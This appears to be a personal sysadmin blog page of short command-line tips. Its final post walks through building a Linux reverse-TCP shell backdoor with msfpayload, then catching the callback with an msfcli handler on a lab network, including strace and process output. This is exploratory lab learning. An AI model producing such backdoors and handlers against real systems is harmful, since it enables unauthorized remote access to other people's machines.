Skip to main content

Spell check from the command line

I was pleasantly surprise to learn about a utility which lets you spell check text files or any string passed as standard input, directly from the command line.

Example 1

[email protected]:~$ echo "What the fuc or what the fuck" | spell
fuc

Example 2

[email protected]:~$ cat test.txt
Fuck thi shit.
[email protected]:~$ spell test.txt
thi

Awesome Applications: 

Installing system-config-kickstart on Ubuntu

So, system-config-kickstart fails to start after the initial install.

Error:

[email protected]:~$ system-config-kickstart
Traceback (most recent call last):
File "/usr/share/system-config-kickstart/system-config-kickstart.py", line 92, in
kickstartGui.kickstartGui(file)
File "/usr/share/system-config-kickstart/kickstartGui.py", line 131, in __init__
self.X_class = xconfig.xconfig(xml, self.kickstartData)
File "/usr/share/system-config-kickstart/xconfig.py", line 80, in __init__
self.fill_driver_list()
File "/usr/share/system-config-kickstart/xconfig.py", line 115, in fill_driver_list
raise RuntimeError, (_("Could not read video driver database"))
RuntimeError: Could not read video driver database

Fix:
Downgrade the hwdata package.

# apt-get remove hwdata
# wget ftp://mirror.ovh.net/mirrors/ftp.debian.org/debian/pool/main/h/hwdata/hw...
# dpkg -i hwdata_0.234-1_all.deb
# apt-mark hold hwdata
# apt-get install system-config-kickstart

This is a known bug in Ubuntu that is yet to be fixed...
https://bugs.launchpad.net/ubuntu/+source/system-config-kickstart/+bug/1260107
https://bugs.launchpad.net/ubuntu/+source/system-config-kickstart/+bug/1236315

Linux: 

Awesome Applications: 

Ah Shit - check_http string

After updating the themes of www.alpha01.org, www.rubysecurity.org, www.rubyninja.org I completely forgot to also update the header template files to include once again their respective Google Analytics tracking code. This resulting in almost three months of no stats. When I originally setup the Nagios check_http 's on my sites, I didn't set them to also search for the custom Google Analytics string, which I always use this configuration at work on all http checks.

This can easily be accomplish using the -s|--string option of the check_http plugin.

/usr/local/nagios/libexec/check_http -I www.rubysecurity.org -S -t 10 --string UA-12912270-3

So the lesson learned, you should always configure your check_http Nagios service checks to also search for a custom string as part of the check!

Awesome Applications: 

Google Apps API OAuth2 shenanigans

So I literally was just about to start flipping tables because I wasn't able to get my Google Apps API OAuth2 api verification to work. I was getting the following error:

401. That’s an error.

Error: invalid_client

no support email

As the documentation describes, I created my application and enabled Calendar API access to it, and lastly setup my credentials. The problem was that I was generating my OAuth 2.0 client IDs without completing the app's consent screen data. As soon as I specified my email address in my app's consent screen data and regenerated new a client ID, I was able to authenticate my application. If only the Google Developer Console would've given a warning of some sort prior to generating a client ID, a lot of #!%[email protected]*# moments would've been avoided.

Programming: 

Awesome Applications: 

PF syntax check

[[email protected] /etc]# pfctl -nf /etc/pf.conf
/etc/pf.conf:4: syntax error

Awesome Applications: 

Unix: 

Restarting single network interface in FreeBSD

service netif restart em0

Unix: 

Logging your terminal output using script

I remember when I first discovered the tab key autocomplete in Bash and being absolutely jollied because of it. Having just found the existence of the script utility, it feels almost identical.

script gives you the capability of logging every thing within your current shell session. In the past, I would always resort to manually copying the text output of my terminal window to a file. In some cases, I would have a really long command line session that I wanted its output saved, which resulted in the entire terminal window crashing when being manually copied due to the extremely large output buffer! Thankfully with script those problems are a thing of the past.

Its usage is dead simple:

[email protected]:~$ script logmyshit.log
Script started, file is logmyshit.log
[email protected]:~$ echo "script is fucking awesome!"
script is fucking awesome!
[email protected]:~$ exit

Contents of logmyshit.log:

Script started on Wed 04 Feb 2015 10:15:32 PM PST
[email protected]:~$ echo "script is fucking awesome!"
script is fucking awesome!
[email protected]:~$ exit

Script done on Wed 04 Feb 2015 10:16:00 PM PST

Awesome Applications: 

System Update using Ansible

CentOS

ansible centosbox -m yum -a 'name=* state=latest'

Debian

ansible debianbox -m apt -a 'update_cache=yes name=* state=latest'

Linux: 

Awesome Applications: 

Perl - Remove all blank lines from a file

Remove all blank lines from a file using Perl:

perl -ne 'print unless /^\s+$/ ' test.txt

Programming: 

Msfpayload Greatness - Creating a Simple Backdoor

So it's Saturday night, I don't have a date, nor am I drunk, so lets hack!

I'm not a Metasploit ninja what so ever, and the basic MSF knowledge I have is playing with it via msfconsole. I've heard of msfpayload and its capabilities, but I've never gotten a chance to play around with it until now. Holyshit, msfpayload is freaking awesome! Msfpayload essentially gives you the ability to export payloads into a standalone binary executable or dll and yet even cooler, as well as the actual raw shellcode representation in either C, C#, Perl, Ruby, JS, VBA, and Python.

To illustrate its greatness, its dead simple to create a standalone backdoor that you can deploy onto any system.

Syntax is straight forward:

[email protected]:~# msfpayload -h

    Usage: /opt/metasploit/apps/pro/msf3/msfpayload [< options >]  < payload > [var=val] <[S]ummary|C|Cs[H]arp|[P]erl|Rub[Y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar|Pytho[N]>

OPTIONS:

    -h       Help banner
    -l       List available payloads

So lets create our self a simple tcp reverse shell. Communicating with the payload is practically identical as with msfconsole, in this case the LHOST, listening parameter is required. X, parameter is saying that we want a binary executable, and we save the file as cool_shit.

[email protected]:~# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.56.102 X > cool_shit
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 71
Options: {"LHOST"=>"192.168.56.102"}

At this point, assuming the backdoor has been copied to the victim's system. The attacking computer can initiate the payload.

[email protected]:~# msfcli multi/handler payload=linux/x86/shell/reverse_tcp LHOST=192.168.56.102 E
[*] Initializing modules...
[-] Failed to connect to the database: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?

payload => linux/x86/shell/reverse_tcp
LHOST => 192.168.56.102
[*] Started reverse handler on 192.168.56.102:4444
[*] Starting the payload handler...

From here the attacker waits, until the backdoor is run on the victims computer.
Reverse TCP Shell

Their a few gotchas and quirks that I noticed. The payload handler has to initiated on the attacker's system prior to running the backdoor, other wise the reverse shell backdoor will crash.

[email protected]-vm:~$ ./cool_shit
Segmentation fault (core dumped)

(Detailed strace output)

xecve("./cool_shit", ["./cool_shit"], [/* 20 vars */]) = 0
[ Process PID=4859 runs in 32 bit mode. ]
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.56.102")}, 102) = -1 ECONNREFUSED (Connection refused)
syscall_4294967165(0xffaa1000, 0x1000, 0x7, 0, 0x3, 0) = -1 (errno 38)
syscall_4294967043(0x3, 0xffaa15b8, 0xffff0cff, 0, 0x3, 0) = -1 (errno 38)
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x66ffaa} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)

The second quirk was that I wasn't able to properly get a native shell session, but rather just limited to session's commands
Reverse TCP Shell

Even the process itself on the victim's system gave /bin//sh instead of /bin/sh ....

root 4227 0.0 0.1 61364 3052 ? Ss 22:53 0:00 /usr/sbin/sshd -D
root 4323 0.0 0.2 109784 4280 ? Ss 22:53 0:00 \_ sshd: tony [priv]
tony 4359 0.0 0.0 109932 1948 ? S 22:53 0:00 | \_ sshd: [email protected]/1
tony 4360 0.0 0.1 26908 4024 pts/1 Ss 22:53 0:00 | \_ -bash
tony 4874 0.0 0.0 4444 652 pts/1 S+ 23:48 0:00 | \_ /bin//sh

I haven't done much research on this quirk, it may just be some mistake on my end.

Obviously, malicious backdoors are a lot more sophisticated than this, however the fact that the Metasploit Framework lets us easily create them, as proof-of-concept this is truly amazing.

Reference: http://www.offensive-security.com/metasploit-unleashed/Msfpayload

Linux: 

Awesome Applications: 

Pages

Premium Drupal Themes by Adaptivethemes